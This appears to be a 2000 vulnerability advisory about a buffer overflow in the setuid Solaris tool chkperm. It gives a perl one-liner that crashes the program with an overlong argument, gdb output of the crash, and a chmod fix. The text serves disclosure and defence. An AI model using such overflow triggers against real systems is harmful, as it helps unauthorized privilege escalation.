[ http://www.rootshell.com/ ]

Date: Thu, 6 Jan 2000 04:36:18 +0900
From: "±è¿ëÁØ KimYongJun (99Á¹¾÷)" <s96192@CE.HANNAM.AC.KR>
Subject: [Hackerslab bug_paper] Solaris chkperm buffer overflow

[Hackerslab bug_paper] Solaris chkperm buffer overflow


File   :   /usr/vmsys/bin/chkperm

SYSTEM :   Solaris 2.x


INFO :

We all know that  /usr/vmsys/bin/chkperm contains a mountain of known bugs.

Here's one more that I found; The "Buffer Overflow" vulnerability.

The problem occurs when it gets the argument. It accepts the argument
without checking out its length, and this causes the problem.

It seems that this vulnerability also applies to Solaris 7, the latest
version.


[Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
Segmentation fault (core dumped)
[hackerslab:/users/loveyou/buf]$ gdb chkperm core
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (sparc-sun-solaris2.5.1),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxx'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0  0xef73ea68 in nvmatch ()


How to fix - Quick Reference
--------------------------

it  is recommended that  the suid bit is
removed from chkperm using command :

 chmod 400 /usr/vmsys/bin/chkperm



- Yong jun Kim -
e - mail : loveyou@securesoft.co.kr    ,  loveyou@hackerslab.org
homepage : http://www.securesoft.co.kr ,  http://www.hackerslab.org

bye~   :)

[ http://www.rootshell.com/ ]